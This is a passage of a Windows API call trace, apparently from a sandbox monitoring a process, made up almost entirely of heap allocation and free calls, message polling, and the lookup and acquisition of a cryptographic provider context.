0x246d7e0 [0208.306] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0208.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0208.306] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0208.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.311] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0208.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.312] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.313] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2720) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0208.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0208.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0208.317] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0208.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0208.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0208.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0208.318] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0208.318] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0208.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0208.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0208.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0208.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0208.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.320] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0208.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0208.320] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0208.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0208.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0208.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0208.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0208.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0208.320] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 